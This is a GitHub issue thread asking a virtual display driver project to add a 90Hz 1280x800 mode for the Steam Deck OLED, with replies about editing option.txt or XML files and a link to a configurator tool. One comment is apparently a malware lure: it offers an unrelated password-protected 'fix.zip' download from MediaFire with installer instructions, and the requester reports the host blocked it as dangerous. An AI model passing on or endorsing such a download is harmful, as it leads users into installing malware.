### ISSUE TITLE
90Hz for HDR 1280x800 for SteamDeck OLED

### ISSUE THREAD

**Issue by jas8472** [itsmikethetech/Virtual-Display-Driver#143]
Hello,  This is great I love it, just one small request please, can you add more refresh rates for 1280x800 specifically for the Steam Deck OLED. 90Hz is the max the screen will do with a max brightness of 1000 nits. Other refresh rates might be useful but not essential, leave 60Hz in for the standard Steam Deck. Thank you, Jason.

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ECX-0** [comment]
If you edit the option file I believe you can add more refresh rates

**Comment by bud3699** [comment]
If you're on release version, You can add resolutions and refresh rates via the option.txt file

If you're on the beta release version, you can add resolutions via the XML file, if you choose to still use option.txt file on beta release the XML File can be deleted. However XML file takes priority over the option.txt

**Comment by jas8472** [comment]
Hi Jonty,
Thanks for the fix and amazing turn around.
When I tried to download it, I got a message from media fire saying it had blocked a dangerous file.
Jas.

Sent from Outlook for Android<https://aka.ms/AAb9ysg>
________________________________

**Comment by sofmeright** [comment]
I just finished a release of a configurator tool that would allow you to set the resolution with a command or in the GUI if you are interested and have difficulty with xml or txt editing.

Virtual Display Driver: Wizard
A GUI tool for manipulation (Install / Uninstall / Reload / Configure) of Indirect Display Driver Sample (IddSample) implementations like the HDR capable [Virtual Display Driver from itsmikethetech](https://github.com/itsmikethetech/Virtual-Display-Driver) that works on Windows 10/11. This installer/configuration tool is intended to provide a more elegant solution in place of needing to edit configs or use Device Manger for driver installation.
https://github.com/sofmeright/VirtualDisplayDriver_Wizard/blob/main/README.md
